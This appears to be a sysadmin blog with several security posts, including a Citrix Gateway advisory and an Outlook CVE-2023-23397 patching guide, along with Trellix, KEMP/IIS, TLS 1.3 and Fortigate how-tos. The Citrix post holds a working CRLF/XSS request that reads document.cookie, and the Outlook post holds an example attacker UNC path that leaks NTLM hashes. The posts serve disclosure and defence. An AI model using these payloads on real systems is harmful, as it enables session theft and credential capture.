02.07.2023, CITRIX 0-DAY, Pre Authentication XSS in Citrix Gateway (CVE-2023-24488)

by butsch 2. July 2023 23:42

02.07.2023

Attacker is able to change the redirection of the LOGOUT page. To date we are unsure if this is only if you you use SAML as in the NOV 2022 Exploit.

GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1

Pre Authentication XSS in Citrix Gateway (CVE-2023-24488)

Die Abfrageparameter für URL werden nicht ausreichend gesäubert, bevor sie in den HTTP Location-Header eingefügt werden. Ein Angreifer kann dies ausnutzen, um einen Link zu erstellen, der beim Klicken das Opfer zu einer beliebigen Stelle umleitet. Alternativ kann der Angreifer Zeilenumbruchzeichen in den Location-Header einfügen, um vorzeitig die HTTP-Header zu beenden und eine XSS-Payload in den Antworttext einzufügen.

Auswirkungen
Ein Angreifer kann bösartige Links erstellen, die entweder das Opfer zu einer von ihm kontrollierten Website umleiten oder JavaScript im Browser des Opfers ausführen, wenn sie geklickt werden.

Betroffene Software
Die folgenden Versionen sind von dieser Schwachstelle betroffen:

Citrix ADC und Citrix Gateway 13.1 vor 13.1-45.61
Citrix ADC und Citrix Gateway 13.0 vor 13.0-90.11
Citrix ADC und Citrix Gateway 12.1 vor 12.1-65.35
Citrix ADC 12.1-FIPS vor 12.1-55.296
Citrix ADC 12.1-NDcPP vor 12.1-55.296

Produktbeschreibung
Citrix Gateway ist eine Netzwerk-Appliance, die verschiedene Funktionen, einschließlich Remote-Zugriffs-VPN-Diensten, bereitstellt.

Lösung
Aktualisieren Sie auf die neueste Version von Citrix Gateway.

LINK CITRIX:

Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-24487, CVE-2023-24488

https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488

Translated from English:

Anwendbare Produkte
Citrix ADC Citrix Gateway
Beschreibung des Problems
Es wurden Sicherheitslücken in den unten aufgeführten Citrix ADC- und Citrix Gateway-Versionen entdeckt, die bei Ausnutzung zu folgenden Sicherheitsproblemen führen könnten:

Betroffene Produkte, Versionen und Komponenten
Die folgenden unterstützten Versionen von Citrix ADC und Citrix Gateway sind von dieser Sicherheitslücke betroffen:

Citrix ADC und Citrix Gateway 13.1 vor 13.1-45.61
Citrix ADC und Citrix Gateway 13.0 vor 13.0-90.11
Citrix ADC und Citrix Gateway 12.1 vor 12.1-65.35
Citrix ADC 12.1-FIPS vor 12.1-55.296
Citrix ADC 12.1-NDcPP vor 12.1-55.296

Dieses Bulletin betrifft nur von Kunden verwaltete Citrix ADC- und Citrix Gateway-Installationen. Kunden, die Citrix-gemanagte Cloud-Services oder Citrix-gemanagte Adaptive Authentication nutzen, müssen keine Maßnahmen ergreifen.

CVE ID Beschreibung Voraussetzungen CWE CVSS
CVE-2023-24488 Cross-Site Scripting Appliance muss als Gateway konfiguriert sein (SSL VPN, ICA Proxy, CVPN, RDP Proxy) oder AAA-Virtual Server CWE-79 6,1
CVE-2023-24487 Willkürliches Lesen von Dateien Zugriff auf NSIP oder SNIP mit Zugriff auf das Management-Interface CWE-253 6,3

Was Kunden tun sollten
Betroffene Kunden von Citrix ADC und Citrix Gateway sollten so schnell wie möglich die entsprechenden aktualisierten Versionen von Citrix ADC oder Citrix Gateway installieren:

Citrix ADC und Citrix Gateway 13.1-45.61 und neuere Versionen
Citrix ADC und Citrix Gateway 13.0-90.11 und neuere Versionen von 13.0
Citrix ADC und Citrix Gateway 12.1-65.35 und neuere Versionen von 12.1
Citrix ADC 12.1-FIPS 12.1-55.296 und neuere Versionen von 12.1-FIPS
Citrix ADC 13.1-FIPS 13.1-37.150 und neuere Versionen von 13.1-FIPS
Citrix ADC 12.1-NDcPP 12.1-55.296 und neuere Versionen von 12.1-NDcPP

Danksagungen
Citrix dankt Petr Juhanak von Accenture, Dylan Pindur von Assetnote und Wisdomtree vom Ant Group Digital Financial Security Team für die Zusammenarbeit zum Schutz der Citrix-Kunden.

Was Citrix unternimmt
Citrix benachrichtigt Kunden und Vertriebspartner über dieses potenzielle Sicherheitsproblem durch die Veröffentlichung dieses Sicherheitsbulletins im Citrix Knowledge Center unter https://support.citrix.com/securitybulletins.

Unterstützung zu diesem Thema erhalten
Wenn Sie technische Unterstützung zu diesem Thema benötigen, wenden Sie sich bitte an den Citrix Technical Support. Die Kontaktdaten für den Citrix Technical Support finden Sie unter https://www.citrix.com/support/open-a-support-case.

Die offizielle Sicherheitsmeldung von Citrix finden Sie hier.

Tags:

IT | Hotfixes / Updates | SECURITY

Mcafee/Trellix EPO 5.10.0 Service Pack Repost 1, 4098, fails to install and rollback

by butsch 7. June 2023 15:15

Update to 5.10.0 Service Pack 1 BUILD 4098

There is an issue with EPO 5.10.0 Service Pack 1 RE-Post.

We have seen some EPO 5.10.0 Service Pack 1 gone through smooth and some larger EPO fail. Trellix member CDINET from Trellix Forum stated a tip how to install sucessfully.

 

Here is how to solve the update. Worst the MSI Installer rollback does not work and keeps the EPO in a state of not working. Thus it is important to have a Hypervisor FALLBACKUP or VEEAM if this fails.

Make sure you install all PRE SP1 Updates UP TO "ePO_5.10.0_Update_15" (This are add. steps and we asume your ARE at level UPD15 already for the SP1). Please see Trellix KB

On how to get to those Patche Update 15 Level.

Process to patch EPO 5.10 to latest Service Pack 1 from 5.10 UP15 succesfully:

Backup all you have because we have a high % this will fail. It's re-post Patch they already took back once.

Turn off/Shutdown all Mcafee/Trellix machines you have (EPO, DXL, Broker, TIE etc.)

Logon to TIE and DXL broker Console or SSH and use "shutdown –f 1"

Make a VM Snapshot for disaster fallback. The snapshot should be OFF and at same time because of DXL (If you use DXL)

Start all VM machines

On EPO Server disbales the two WMI related Services

Reboot the EPO Server

Install SP1 will be success

Change back the two WMI Services as seen in Screenshot

 

Services before:

change to:

Reboot once

 

Check Events

Change back the Services like they where before

Services before:

If you want to 100% sure check the Logs

trail

2023-06-07T10:54:26.226Z - info: Executed batch sql scripts for snapshot

2023-06-07T10:54:26.262Z - info: Successfully got connection

2023-06-07T10:54:26.266Z - info: Successfully got connection

2023-06-07T10:54:26.276Z - info: Successfully got connection

2023-06-07T10:54:26.290Z - info: Successfully got connection

2023-06-07T10:54:26.302Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/simagent64.exe'

2023-06-07T10:54:26.302Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:26.303Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/eposignle.exe'

2023-06-07T10:54:26.303Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:26.315Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/simagent.exe'

2023-06-07T10:54:26.315Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:26.317Z - info: Sucessfully executed SQL DELETE FROM [dbo].[EPOSnapshotFiles] WHERE [FilePath] = '/eposignse.exe'

2023-06-07T10:54:26.317Z - info: Successfully deleted entries EPOSnapshotFiles

2023-06-07T10:54:44.004Z - info: Service EPOEVENTPARSERSRV status is started

2023-06-07T10:54:55.599Z - error: Service start error :Error: Timed out attempting to start EPOAHAPACHESRV.

2023-06-07T10:54:55.709Z - error: Service start error :Error: Timed out attempting to start EPOAHAPACHESRV.

2023-06-07T10:55:05.723Z - info: Service EPOTOMCATSRV5100 status is started

2023-06-07T10:55:05.821Z - info: Determining if service EPOAHAPACHESRV is started or not

2023-06-07T10:55:16.299Z - info: Service EPOAHAPACHESRV status is started

 

 

Tags:

SECURITY | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

M365, Exchange Online Remote Powershell blocked by T1056 Mitre Trellix

by butsch 4. April 2023 03:00

Trellix ENS 10.X, T1056 - Key capture using Powershell detected, Host intrusion buffer overflow

ExP:Illegal API Use Blocked an attempt to exploit

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE, which targeted the GetAsyncKeyState API.

 

Hello,

If you want to manage M365, Exchange Online there are several ways. You can use the PS button within the Admin Portal but then you need an Azure licence for a seperate account you made for IT.

We also tried the Remote shell to M365 on Several Server and working clients and found some important fact.

Most Antivirus Solution who do more than other and who reflect MITRE rules capture the Connection as phising attack for credentials as defined in MITRE T1056, Keylogger. Yo you will have to exclude the machines where IT people use Remote shell and ASK for credentials with the POPUP GUI (Not passing the password in the cli command)

 

https://learn.microsoft.com/en-us/powershell/exchange/connect-to-exchange-online-powershell?view=exchange-ps

Install-Module -Name ExchangeOnlineManagement –Force

Connect-ExchangeOnline

 

You can find and also exclude the API function call in Trellix EPO like this. I would like to state that you should only exclude the T1056 on machines where the Exchange Admin will work.

Select the EXPLOIT, checkbox, then bottom page left side, ADD Exclusion

 

Choose the POLICY you have for your Clients you want to change the single false

Again best would be NOT to exclude that MITRE for all enduser just for the IT machines.

Since Mcafee/Trellix ENS you can do POLICIES for all (Great range) and than add. to that more

fine granular policies for some machines or targets (Like we know from Windows gpo with WMI filter)

T1056

Threat Target Process Name:    POWERSHELL.EXE

Threat Target File Path:    C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE

Event Category:    Host intrusion buffer overflow

Event ID:    18054

Threat Severity:    Critical

Threat Name:    ExP:Illegal API Use

Threat Type:    Exploit Prevention

Action Taken:    Blocked

Threat Handled:    True

Analyzer Detection Method:    Exploit Prevention

Location:    

Module Name:    Threat Prevention

Analyzer Technology Version:    

Analyzer Content Creation Date:    3/6/23 10:06:04 PM CET

Analyzer Content Version:    10.6.0.12731

AMCore Content Version:    

Analyzer Rule ID:    6183

Analyzer Rule Name:    T1056 - Key capture using Powershell detected

 

If you want to disable the 6183 Analyzer rule complete you could do here in your POLICY.

To see you have to choose "OTHERS". By default maybe this rule is not ON in your mcafee/Trellix enviroment. (Out of the box)

 

After the change the Connection should work:

 

Tags:

Exchange 2013 | Exchange 2016 | Exchange 2019 | M365/AZURE | SECURITY | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

CVE-2023-23397, Outlook.exe Exploit, PidLIDReminder custom Sound ab SMB für Termin Reminder

by butsch 15. March 2023 03:00

CVE-2023-23397 Was ausgenutz wird:

Anstatt Standard Microsoft Outlook Sound kann man für ein meeting reminder einen Custom Sound angeben. Dieser kann auf einem Share liegen. Da liegt der Hund begraben.

https://learn.microsoft.com/de-de/office/client-developer/outlook/mapi/pidlidreminderoverride-canonical-property

https://www.forbes.com/sites/daveywinder/2023/03/15/microsoft-outlook-warning-critical-new-email-exploit-triggers-automatically-update-now/?sh=47f058ce6e5e

CVE-2023-23397 ist ein Outlook-Bug. Wenn Sie eine eingehende E-Mail für einen Termin mit einer benutzerdefinierten Erinnerung (Ton, Attribut PidLIDReminder) senden, wird Outlook.exe (2012/2016) versuchen, die Sounddatei über SMB abzurufen, sogar von einem externen Share (ohne Berücksichtigung von Sites-Zonen in IE/EDGE/System). Wenn Port 445 zu diesem Ziel geöffnet ist, sendet das System einen NTLM-Hash außerhalb Ihres Netzwerks. Wie wir verstanden haben, können die meisten vorhandenen AV-Lösungen für On-Premise-Exchange derzeit dieses Attribut PidLIDReminder nicht scannen (Trend, Trellix Security für Exchange). Deshalb hat das MS Exchange-Team das Skript bereitgestellt.

Hier kann man für einen TERMIN einen Custom Sound angeben.

Z.B. Alarm "\\213.145.33.11\attacker_ldap_scanner_hash\M365_Ausfall_Nichts_geht_mehr_alle_user_Ferien.wav"

 

 PRIO1

besteht darin, das Outlook.exe-Patch zu installieren und die Clients neu zu starten, und auch sicherzustellen, dass Kunden kein SMB für externe Verbindungen öffnen. Dies ist in der Regel ab Client VLAN > WAN geschlossen. Heikel sind Home office, Remote worker welche je nach SPLIT VPN halt 445/SMB offen hätten.

 

Patches for Outlook 2013/2016:

https://support.microsoft.com/kb/5002254

2016 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202016 (All Outlook 2016 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab (32BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_8d949e375d119c72a375435cd77a4797fb2e0b2b.cab (64BIT)

2013 Direct download

https://www.catalog.update.microsoft.com/Search.aspx?q=outlook%202013 (All Outlook 2013 Patches, pick the ones from 14.03.2023)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2cb1193a28972b39546f59d104ae5be489c01d8d.cab (64BIT)

https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2023/02/outlook-x-none_2e7b2f55dcab1fd7d3b00aa1dbd2545fb90e435c.cab (32BIT)

 

Manuelle Installation. Auspacken der CAB files und DANN Doppelclick auf .MSP Patch file

 

Deployment ausserhalb WSUS, für die .CAB Files so kann man diese comnmandline installieren:

DISM.EXE für die Office CAB Files scheint nicht zu gehen.

Man kann aber das File aufmachen und dann einfach das MSP File installieren. Windows Installer sucht und findet den Rest. Z.B. die Quelle des Office Files.

msiexec /p c:\edv\ C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qb

msiexec /p c:\edv\ C:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897\outlook-x-none.msp /qn

 

 

  

DISM.EXE für die Office CAB Files scheint nicht zu gehen.

https://social.technet.microsoft.com/Forums/lync/en-US/683d7d72-b296-419f-b585-becd5d99b37f/dism-offline-update-error-0x80070002

dism /Online /Add-Package /PackagePath:"c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab"

Je nach System gibt dies ein Fehler weil er das darunter notwendige CBS Paket nicht hat:

Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

In der Regel bei anderen CAB Packages sind diese dann mit dabei im CAB/Archiv hier nicht z.B. bei Outlook 2016 auf W11 22H2

Beispiel file dabei von 202X. Da musste man zuerst das SSU installieren und dann den Patch mit DISM.

Bei den jetzigen Outlook Patch aber nur ein MSP mit dabei

2016/W11

023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Processing the top level command token(add-package). - CPackageManagerCLIHandler::Private_ValidateCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Attempting to route to appropriate command handler. - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Routing the command... - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Encountered the option "packagepath" with value "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::Private_GetPackagesFromCommandLine

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed opening package. - CDISMPackageManager::Internal_CreatePackageByPath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the underlying CBS package. - CDISMPackageManager::OpenPackageByPath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to open the package at location: "c:\edv\outlook-x-none_a3461e8b8424793e267728be32cd83c294ebb897.cab" - CPackageManagerCLIHandler::ProcessPackagePath(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed to get the count of packages from the command line. - CPackageManagerCLIHandler::ProcessCmdLine_AddPackage(hr:0x80070002)

2023-03-16 10:46:42, Error DISM DISM Package Manager: PID=18624 TID=15128 Failed while processing command add-package. - CPackageManagerCLIHandler::ExecuteCmdLine(hr:0x80070002)

2023-03-16 10:46:42, Info DISM DISM Package Manager: PID=18624 TID=15128 Further logs for online package and feature related operations can be found at %WINDIR%\logs\CBS\cbs.log - CPackageManagerCLIHandler::ExecuteCmdLine

2023-03-16 10:46:42, Error DISM DISM.EXE: DISM Package Manager processed the command line but failed. HRESULT=80070002

 

The Patch info from WSUS.

 

PRIO2

Ist FORENSIC, um herauszufinden, ob Sie solche E-Mails erhalten haben und hoffentlich verhindern, dass sie an Outlook.exe geliefert werden. Sie können auch diejenigen reparieren, die bereits angekommen sind. Wenn Sie On-Premise sind, überprüfen Sie, ob Ihre Exchange-AV-Lösung nach dem Attribut suchen kann (An sich ahte die AV Loesung fuer Exchange alle Rechte welche man extra für das laufen lassen des Scripts vergeben muss die Frage ist nur OB Sie mit der aktuellen version das Attribut finden)

 

Wichitg für PRIO 2 SKRIPT: Wir empfehlen dies nur für Personen, die Erfahrung mit solchen Befehlen haben, z. B. durch Integration einer Archivlösung oder einer mobilen Geräteverwaltungslösung (MDM). Möglicherweise müssen Sie auch mit Ihrem hausinternen Rechts- / Compliance-Team Rücksprache halten, da Sie jemandem vollen Zugriff auf die E-Mails Ihres CEO und Vorstands gewähren, soweit ich verstanden habe (ich habe das Skript nicht im Detail überprüft).

[https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/]

 

Das Skirpt macht folgendens:

  • Generieren Sie eine unbegrenzte (vollständige) Throttle-Richtlinie für eine Gruppe oder einen Benutzer (wie ein MDM-Masterkonto oder ein Konto, das eine rechtliche Archivlösung speist).
  • Generieren Sie eine Regel, damit ein Benutzer vollen Zugriff auf jede E-Mail, jeden Kalendereintrag usw. hat, die in der Exchange-Umgebung gespeichert sind (Application Impersonation / https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-...).
  • Scannen Sie alle E-Mails oder zumindest einige Tage rückwärts, da die Ukraine im 03/2022 angegriffen wurde, also für ein Jahr? Oder war diese Information falsch? Microsoft sagt hier das man besonders attratkive Targets scannen sollte (Wer sollen diese sein? Der CEO/VR oder nur der User?)

 

Handlungsbedarf 16.03.2023

Patch installieren und sicher stellen, dass alle den Reboot gemacht haben

Sicher stellen dass Port 445/SMB nach LAN>WAN geschlossen ist (Eventuell anpassen Remote Worker Firewall GPO/Policy oder dann via FW-Module z.B. vom Virenschutz, z.B. Mcafee ENS Firewall)

Die derzeit kursierenden PowerShell-Skripte sind ausschließlich für forensische Zwecke und die Suche nach Indicators of Compromise gedacht. Diese Skripte erfordern jedoch vorsichtiges Handling, da der Skript-User mit vollem Zugriff auf alle Ressourcen ausgestattet werden muss, einschließlich der Möglichkeit, die Geschwindigkeit des Skripts zu regulieren. Bitte führen Sie das Skript daher nicht aus, bis wir sicherstellen können, dass es nicht zu Problemen aufgrund von Sprachbarrieren kommt.

Es ist wichtig zu beachten, dass das PowerShell-Skript nicht notwendig ist, um die Outlook.exe-Sicherheitslücke zu schließen. Es dient ausschließlich der forensischen Untersuchung und dem Ersatz von 1-2% der Kalendereinträge, die aufgrund von Offline-Verbindungen noch nicht aktualisiert wurden. Es ist jedoch unwahrscheinlich, dass diese Skripte erforderlich sind, da die erste Welle des Angriffs durch eine E-Mail mit einem blockierten Anhang (.MSI) erfolgte.

Schließlich ist es wichtig zu betonen, dass der Exchange Patch vom März 2023 keine Auswirkungen auf die Outlook.exe-Sicherheitslücke hat.

 

Bild: Quelle ACEResponder/Twitter

Bild: Quelle MS, Learn

Guter Blog:

https://practical365.com/cve-2023-23397-ntlm-vulnerability/ (Nicht die Quelle der Info)

 

Tags:

Hotfixes / Updates | Exchange 2010 | Exchange 2013 | Exchange 2016 | Exchange 2019 | M365/AZURE | SECURITY | SPAM Fortimail

KEMP Load Balancer, Microsoft IIS, How to see Source IP address in Logfiles on Webserver

by butsch 2. February 2023 22:40

 

We once had a case where we should install an URL-Rewrite Module in IIS CAS 2010 to submit more info to Rapid 7 Solution. (This was in time range before all monthly leaks for 2013/2016/2019 came up to force all customers to M365 and it was unclear what the module would do inside Exchange etc.)

We used URL-Rewrite before for Webserver at ISP but it did at once like to use on IIS where you deinstall IIS Sites and re-install with and EXE, which runs 100 Powershell.

 

The CAS where behind a commercial KEMP Load Balancer HA. I just had the same case private on one of my Windows IIS webservers where i tunnel through several active components.

 

SOLUTION: How to see Source IP if you IIS Webserver is behind a KEMP Load Balancer.

Schema:

"WAN"-----"FW1"—"FW2"---"KEMP" (back: 192.168.185.105)-----(front: 192.168.151.70)"WEB SERVER/MS/IIS"

 

Info you have BEFORE in IIS Logfiles (You do not see the Source IP in IIS Logfiles)

2023-01-21 19:08:35 W3SVC2 web 192.168.185.105 GET /image.axd picture=041014_0945_WSUSWindows1.png 443 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/109.0.0.0+Safari/537.36+Edg/109.0.1518.61 - www.butsch.ch 200 0 0 8644 742 4

Solution Info you have after our change in IIS Logfiles (Source IP at end)

2023-01-21 19:46:28 W3SVC2 web 192.168.185.105 GET /category/APP-V.aspx - 80 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1+Safari/605.1.15 - - www.butsch.ch 404 0 0 23895 382 12 15.206.212.159

 

Go onto your KEMP/Also works with free community Version:

 

Select MODIFY Service, Under Advanced Properties change "Add HTTP Headers" to "X-Forwaded-For (No Via)" or try any other option and check on IIS side Logfiles what you see there.

 

Fiest make sure Loggin in IIS is installed (If not).

 

Here is what to change in IIS if you have logging active:

Change the LOGFILE Location to a Disk where you have space or monitor.

Source X-FORDWARDED-FOR that was the field you told him on the KEMP to include in any packet he sends back

 

APPLY

Cmd (Elevated)

IISRESET

Or Restart Server

You will see the Source-IP at the end of line:

 

2023-01-21 19:46:28 W3SVC2 web 192.168.185.105 GET /category/APP-V.aspx - 80 - 192.168.151.70 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1+Safari/605.1.15 - - www.butsch.ch 404 0 0 23895 382 12 15.206.212.159

 

 

 

 

Tags:

Exchange 2016 | SECURITY | Microsoft Exchange | Microsoft Server OS

Browser TLS 1.3 activated and your Firewall can’t handle it?

by butsch 2. September 2020 17:57

TLS 1.3

https://tools.ietf.org/html/rfc8446

Some modern Browser switch to TLS 1.3 automatic if the Web server on the other side supports this. Like Version 72 of Chrome.exe or even your OS is like Windows 10 Buildnummer 20170 upwards (That means the OS itself). So it's all safer and faster?

https://blogs.windows.com/windows-insider/2020/07/15/announcing-windows-10-insider-preview-build-20170/

The problem is that some Next Generation Web Filter (Firewall) can't look into the SSL-encryption anymore and find malware/Ransomware. With Browser self updating mechanism like in Chrome or Edge Chromium you suddenly have a constellation that you did not want. While you approved IE11/EDGE Updates in WSUS and mostly checked each new Release of the Browser before releasing it this has changed.

The interesting point is that also some Load Balancer are only able to break (Deep Inspect) traffic with really new Firmware releases. Customers demanded that feature since 2017 we see in diverse blogs and feature request portals of producers. So if you want to sniff into SSL (Break SSL Stream) and you're Firewall can't handle TLS 1.3 special you currently have a problem.

Check if your browser has TLS 1.3 active is easy

CHROME:

chrome://flags/#tls13-variant (Since Version 72 TLS 1.3 default)

MICROSOFT EDGE CHROMIUM:

edge://flags/

As example Type edge://flags/ in the Browser URL window.

Or jump direct to the TLS 1.3 setting with edge://flags/#enable-tls13-early-data

Open following URL / Test Website to see what's supported:

https://browserleaks.com/ssl

 

https://news.sophos.com/en-us/2020/08/18/report-firewall-best-practices-to-block-ransomware/

https://www.fortinet.com/blog/business-and-technology/tls-is-here-what-this-means-for-you

https://www.f5.com/c/landing/encrypted-threats/article/tls-1-3-are-you-ready-for-the-update

https://community.checkpoint.com/t5/General-Topics/CheckPoint-TLS-1-3-support-When/td-p/63672

https://www.cisco.com/c/en/us/td/docs/security/firepower/630/configuration/guide/fpmc-config-guide-v63/understanding_traffic_decryption.html

https://www.sonicwall.com/support/knowledge-base/ssl-tls-protocols-supported-by-sonicos-matrix/170615123553371/

 

 

Read more:

https://devblogs.microsoft.com/premier-developer/microsoft-tls-1-3-support-reference/

https://www.imperial.ac.uk/media/imperial-college/faculty-of-engineering/computing/public/1819-pg-projects/Detecting-Malware-in-TLS-Traf%EF%AC%81c.pdf

https://blog.cloudflare.com/tls-1-3-overview-and-q-and-a/

https://www.heise.de/security/meldung/Verschluesselung-TLS-1-3-Fauxpas-gefaehrdet-Embedded-Systeme-mit-wolfSSL-4883741.html

https://www.heise.de/hintergrund/Was-TLS-1-3-ist-und-wie-Sie-davon-profitieren-4248740.html

https://www.sans.org/reading-room/whitepapers/vpns/paper/39715

https://nakedsecurity.sophos.com/2020/02/18/malware-and-https-a-growing-love-affair/

 

 

 

Tags:

Hotfixes / Updates | W10 | SECURITY | FW Fortigate | FW Sophos

Fortigate Forticlient Silent Installlevel 1 does not work on 6.X Version how to solve

by butsch 2. April 2019 14:49

 

Problem: Forticlient Silent Option to select different Module to install does not work as before with Forticlient 6.X up to 6.0.5 (FortiClientSetup_6.0.5.0209_x64)

Problem: You see an empty Forticlient Window when you open it

 

 

Explanation:

Bis jetzt gab es fuer den Forticlient:

  • Forti Configurator (Ein Tool bei welchem man die Optionen wählen konnte und dann gleichzeitig ein CONFIG file mitgeben und es machte am Schluss ein MSI)
  • Ein Windows Installer OPTION INSTALLLEVEL (Mit dieser konnte man bis Forticlient 5.9.X sagen was man will (SSLVPN/VPN/Antivirus usw.)

 

Den Configurator gibt es nur noch auf dem Developer Network von Fortinet. Damit man dort an das File kommt MUSS man zwei Fortinet Mitarbeiter als Referenz angeben.

To get the Configurator where you can you have to open a developer account with Fortinet. And to do that you have to get approval of TWO Fortinet employees (Fortinet E-mail Addresses). That's simply because they don't want customer to modify the default install and use the ONLINE Installer so everybody tries their Antivirus and Patch Module. Before you could download the Forticlient Configurator for free und the Support Forticlient download section.

There are also other nice things there like the VPN Automation scripts and SSLVPN Commandline tools. I am sure a lot of Fortinet Customer would like to use those and don't even know they exists and swap to VPN technology from Microsoft https://docs.microsoft.com/en-us/windows-server/remote/remote-access/vpn/always-on-vpn/always-on-vpn-technology-overview

 

 

This thread Shows what happens when you use Installlevel=1 (As worked before with Forticlient 5.X)

https://forum.fortinet.com/tm.aspx?m=165279

https://docs.fortinet.com/document/forticlient/6.0.2/configurator-tool/823336/use-forticlient-configurator-tool-tool-for-windows

 

Forticonfigurator:

 

Nice ;-.)

 

Solution:

Use INSTALLLEVEL 3 instead of 1

 

msiexec.exe /i FortiClientSetup_6.0.5.0209_x64\forticlient.msi /quiet INSTALLLEVEL=3

The MSI package:

VPN, SSLVPN, SSO is fine for most enterprise users.

We don't see the NAC Option in the GUI even if we choose it with option 3 > We don't want that so Installlevel 1 would be the choice but that DOES not work as mentioned.

 

 

Here is the reason Fortigate makes this so complex. They want to sell EMS which can be used to Deploy Forticlient.

 

 

Tags:

SECURITY | FW Fortigate

Missing entry in Fortigate Application Filter ROOT.CERTIFICATE.URL and OCSP source of W10 Setup failing

by butsch 31. October 2018 21:35

Fortigate Application Filter Certificate wrong/missing Entry sample for an important laptop driver (W10 Deployment fails because of signed Driver Revocation Lookup)

OR HOW a missing small ENTRY I a FORTIGATE FIREWALL IPS/APP filter can ruin your Windows 10 OS-Deployment work.

 

Reason: Missing entry in Fortigate Application Filter "ROOT.CERTIFICATE.URL" and "OCSP" source of failing deployment

 

Windows 10 Deployment with commercial Deployment Products (This includes HP client hardware, Microsoft SCCM, Landesk or Ivanti Frontrange).

During the Unattend phase the driver for MASS storage or NIC does a Certificate Revocation Lookup. However the as sample mentioned

URL pki.infineon.com (Hardware Driver URL, CRL FQDN) is missing in Fortiguard definitions. Thus the Fortigate does block the access to WAN. Since this is an early setup phase of W10, group Policy or special GPO do not pull at that moment.

 

Fortigate has already missed several PKI URL the last few months confirmed by ticket resulting in large trouble and delay on client and Server OS of customers who route their Client or Server traffic through Web proxy and because of security do not want to route computer account proxy traffic standard to the proxy.

 

Why this is so important. Why this is generating a lot of work and trouble for OS-Deployment teams.

 

The normal way in larger companies is that all outgoing traffic from client VLAN goes to Firewall which it blocks. All Web/Application/Socks traffic that should go outside goes to a Proxy, Web filter.

Because in early phase of Deployment those options are not set already and normally not needed. However if the driver is older than the Expiration of the Code Signing Certificate W7/W10 will check

The Certificate Revocation list from WAN/Internet. If that fails it may refuse to integrate the driver in Windows PE or early Windows Setup phase. If example this is a driver which

handels NIC (network) or mass Storage driver (Disk) they deployment can't run through this early process.

 

 

 

Workaround:

URL we need open in our sample: pki.infineon.com which prevents a complete Enterprise Deployment system to fail

 

 

 

Sample from Fortigate for other Certs they missed:

 

F-SBID( --name "Root.Certificate.URL_Custom"; --protocol tcp; --app_cat 17; --service HTTP; --flow from_client; --pcre "/(crl\.microsoft\.com|\.omniroot\.com|\.verisign\.com|\.symcb\.com|\.symcd\.com|\.verisign\.ne t|\.geotrust\.com|\.entrust\.net|\.public- trust\.com|\.globalsign\.|\.digicert\.com|crl\.startcom\.|crl\.cnnic\.cn|crl\.identrust\.com|crl\.thaw te\.com|crlsl\.wosign\.com|www\.d\-trust\.net)/"; --context host; --weight 15; )

 

In our case:

 

F-SBID( --name "Root.Certificate.pki.infineon.com"; --protocol tcp; --app_cat 17; --service HTTP; -- flow from_client; --pcre "/(pki\.infineon\.com)/"; --context host; --weight 15; )

Please also see:

Butsch.ch | The certificate is invalid for exchange server usage Exchange 2010 SAN/UC

https://www.butsch.ch/post/The-certificate-is-invalid-for-exchange-server-usage-Exchange-2010-SANUC

So you understand that this is a problem which persists over all firewall producers:

https://support.symantec.com/en_US/article.HOWTO9584.html

